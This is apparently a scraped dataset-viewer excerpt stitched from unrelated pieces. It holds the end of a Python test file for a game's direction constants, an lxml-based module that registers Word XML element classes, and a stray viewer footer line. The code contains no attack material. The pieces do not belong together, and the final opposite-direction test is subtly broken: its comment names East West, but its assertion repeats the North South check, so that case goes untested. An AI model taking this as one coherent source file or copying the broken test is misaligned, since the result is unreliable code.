the axis movement aliases (x+, x-, y+, y-).
"""
# x+ is East
assert constants.Direction.x_plus() == constants.Direction.east
# x- is West
assert constants.Direction.x_minus() == constants.Direction.west
# y+ is South
assert constants.Direction.y_plus() == constants.Direction.south
# y- is North
assert constants.Direction.y_minus() == constants.Direction.north
def test_opposite(self):
"""Assure opposite directions are being produced correctly.
"""
direction = constants.Direction
# The opposite of North is South
assert (direction.opposite(direction.north) ==
direction.south)
# The opposite of South is North
assert (direction.opposite(direction.south) ==
direction.north)
# The opposite of East is West
assert (direction.opposite(direction.east) ==
direction.west)
# The opposite of West is East
assert (direction.opposite(direction.west) ==
direction.east)
# The opposite of North East is South West
assert (direction.opposite(direction.north_east) ==
direction.south_west)
# The opposite of South West is North East
assert (direction.opposite(direction.south_west) ==
direction.north_east)
# The opposite of North West is South East
assert (direction.opposite(direction.north_west) ==
direction.south_east)
# The opposite of South East is North West
assert (direction.opposite(direction.south_east) ==
direction.north_west)
# The opposite of North South is East West
assert (direction.opposite(direction.north_south) ==
direction.east_west)
# The opposite of East West is North South
assert (direction.opposite(direction.north_south) ==
direction.east_west)
def test_action():
"""Test constants.Action.
"""
assert constants.Action.stand == constants.Action(1)
assert constants.Action.walk == constants.Action(2)
|
|
# encoding: utf-8
"""
Initializes oxml sub-package, including registering custom element classes
corresponding to Open XML elements.
"""
from __future__ import absolute_import
from lxml import etree
from .ns import NamespacePrefixedTag, nsmap
# configure XML parser
element_class_lookup = etree.ElementNamespaceClassLookup()
oxml_parser = etree.XMLParser(remove_blank_text=True, resolve_entities=False)
oxml_parser.set_element_class_lookup(element_class_lookup)
def parse_xml(xml):
"""
Return root lxml element obtained by parsing XML character string in
*xml*, which can be either a Python 2.x string or unicode. The custom
parser is used, so custom element classes are produced for elements in
*xml* that have them.
"""
root_element = etree.fromstring(xml, oxml_parser)
return root_element
def register_element_cls(tag, cls):
"""
Register *cls* to be constructed when the oxml parser encounters an
element with matching *tag*. *tag* is a string of the form
``nspfx:tagroot``, e.g. ``'w:document'``.
"""
nspfx, tagroot = tag.split(':')
namespace = element_class_lookup.get_namespace(nsmap[nspfx])
namespace[tagroot] = cls
def OxmlElement(nsptag_str, attrs=None, nsdecls=None):
"""
Return a 'loose' lxml element having the tag specified by *nsptag_str*.
*nsptag_str* must contain the standard namespace prefix, e.g. 'a:tbl'.
The resulting element is an instance of the custom element class for this
tag name if one is defined. A dictionary of attribute values may be
provided as *attrs*; they are set if present. All namespaces defined in
the dict *nsdecls* are declared in the element using the key as the
prefix and the value as the namespace name. If *nsdecls* is not provided,
a single namespace declaration is added based on the prefix on
*nsptag_str*.
"""
nsptag = NamespacePrefixedTag(nsptag_str)
if nsdecls is None:
nsdecls = nsptag.nsmap
return oxml_parser.makeelement(
nsptag.clark_name, attrib=attrs, nsmap=nsdecls
)
# ===========================================================================
# custom element class mappings
# ===========================================================================
from .shared import CT_DecimalNumber, CT_OnOff, CT_String
from .coreprops import CT_CoreProperties
register_element_cls('cp:coreProperties', CT_CoreProperties)
from .document import CT_Body, CT_Document
register_element_cls('w:body', CT_Body)
register_element_cls('w:document', CT_Document)
from .numbering import (
CT_Num, CT_Numbering, CT_NumLvl, CT_NumPr
)
register_element_cls('w:abstractNumId', CT_DecimalNumber)
register_element_cls('w:ilvl', CT_DecimalNumber)
register_element_cls('w:lvlOverride', CT_NumLvl)
register_element_cls('w:num', CT_Num)
register_element_cls('w:numId', CT_DecimalNumber)
register_element_cls('w:numPr', CT_NumPr)
register_element_cls('w:numbering', CT_Numbering)
register_element_cls('w:startOverride', CT_DecimalNumber)
from .section import CT_PageMar, CT_PageSz, CT_SectPr, CT_SectType
register_element_cls('w:pgMar', CT_PageMar)
register_element_cls('w:pgSz', CT_PageSz)
register_element_cls('w:sectPr', CT_SectPr)
register_element_cls('w:type', CT_SectType)
from .shape import (
CT_Blip, CT_BlipFillProperties, CT_GraphicalObject,
CT_GraphicalObjectData, CT_Inline, CT_NonVisualDrawingProps, CT_Picture,
CT_PictureNonVisual, CT_Point2D, CT_PositiveSize2D, CT_ShapeProperties,
CT_Transform2D
)
register_element_cls('a:blip', CT_Blip)
register_element_cls('a:ext', CT_PositiveSize2D)
register_element_cls('a:graphic', CT_GraphicalObject)
register_element_cls('a:graphicData', CT_GraphicalObjectData)
register_element_cls('a:off', CT_Point2D)
register_element_cls('a:xfrm', CT_Transform2D)
register_element_cls('pic:blipFill', CT_BlipFillProperties)
register_element_cls('pic:cNvPr', CT_NonVisualDrawingProps)
register_element_cls('pic:nvPicPr', CT_PictureNonVisual)
register_element_cls('pic:pic', CT_Picture)
register_element_cls('pic:spPr', CT_ShapeProperties)
register_element_cls('wp:docPr', CT_NonVisualDrawingProps)
register_element_cls('wp:extent', CT_PositiveSize2D)
register_element_cls('wp:inline', CT_Inline)
from .styles import CT_LatentStyles, CT_LsdException, CT_Style, CT_Styles
register_element_cls('w:basedOn', CT_String)
register_element_cls('w:latentStyles', CT_LatentStyles)
register_element_cls('w:locked', CT_OnOff)
register_element_cls('w:lsdException', CT_LsdException)
register_element_cls('w:name', CT_String)
register_element_cls('w:next', CT_String)
register_element_cls('w:qFormat', CT_OnOff)
register_element_cls('w:semiHidden', CT_OnOff)
register_element_cls('w:style', CT_Style)
register_element_cls('w:styles', CT_Styles)
register_element_cls('w:uiPriority', CT_DecimalNumber)
register_element_cls('w:unhideWhenUsed', CT_OnOff)
from .table import (
CT_Row, CT_Tbl, CT_TblGrid, CT_TblGridCol, CT_TblLayoutType, CT_TblPr,
CT_TblWidth, CT_Tc, CT_TcPr, CT_VMerge
)
register_element_cls('w:bidiVisual', CT_OnOff)
register_element_cls('w:gridCol', CT_TblGridCol)
register_element_cls('w:gridSpan', CT_DecimalNumber)
register_element_cls('w:tbl', CT_Tbl)
register_element_cls('w:tblGrid', CT_TblGrid)
register_element_cls('w:tblLayout', CT_TblLayoutType)
register_element_cls('w:tblPr', CT_TblPr)
register_element_cls('w:tblStyle', CT_String)
register_element_cls('w:tc', CT_Tc)
register_element_cls('w:tcPr', CT_TcPr)
register_element_cls('w:tcW', CT_TblWidth)
register_element_cls('w:tr', CT_Row)
register_element_cls('w:vMerge', CT_VMerge)
from .text.font import (
CT_Color, CT_Fonts, CT_Highlight, CT_HpsMeasure, CT_RPr, CT_Underline,
CT_VerticalAlignRun
)
register_element_cls('w:b', CT_OnOff)
register_element_cls('w:bCs', CT_OnOff)
register_element_cls('w:caps', CT_OnOff)
register_element_cls('w:color', CT_Color)
register_element_cls('w:cs', CT_OnOff)
register_element_cls('w:dstrike', CT_OnOff)
register_element_cls('w:emboss', CT_OnOff)
register_element_cls('w:highlight', CT_Highlight)
register_element_cls('w:i', CT_OnOff)
register_element_cls('w:iCs', CT_OnOff)
register_element_cls('w:imprint', CT_OnOff)
register_element_cls('w:noProof', CT_OnOff)
register_element_cls('w:oMath', CT_OnOff)
register_element_cls('w:outline', CT_OnOff)
register_element_cls('w:rFonts', CT_Fonts)
register_element_cls('w:rPr', CT_RPr)
register_element_cls('w:rStyle', CT_String)
register_element_cls('w:rtl', CT_OnOff)
register_element_cls('w:shadow', CT_OnOff)
register_element_cls('w:smallCaps', CT_OnOff)
register_element_cls('w:snapToGrid', CT_OnOff)
register_element_cls('w:specVanish', CT_OnOff)
register_element_cls('w:strike', CT_OnOff)
register_element_cls('w:sz', CT_HpsMeasure)
register_element_cls('w:u', CT_Underline)
register_element_cls('w:vanish', CT_OnOff)
register_element_cls('w:vertAlign', CT_VerticalAlignRun)
register_element_cls('w:webHidden', CT_OnOff)
from .text.paragraph import CT_P
register_element_cls('w:p', CT_P)
from .text.parfmt import (
CT_Ind, CT_Jc, CT_PPr, CT_Spacing, CT_TabStop, CT_TabStops
)
register_element_cls('w:ind', CT_Ind)
register_element_cls('w:jc', CT_Jc)
register_element_cls('w:keepLines', CT_OnOff)
register_element_cls('w:keepNext', CT_OnOff)
register_element_cls('w:pageBreakBefore', CT_OnOff)
register_element_cls('w:pPr', CT_PPr)
register_element_cls('w:pStyle', CT_String)
register_element_cls('w:spacing', CT_Spacing)
register_element_cls('w:tab', CT_TabStop)
register_element_cls('w:tabs', CT_TabStops)
register_element_cls('w:widowControl', CT_OnOff)
from .text.run import CT_Br, CT_R, CT_Text
register_element_cls('w:br', CT_Br)
register_element_cls('w:r', CT_R)
register_element_cls('w:t', CT_Text)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.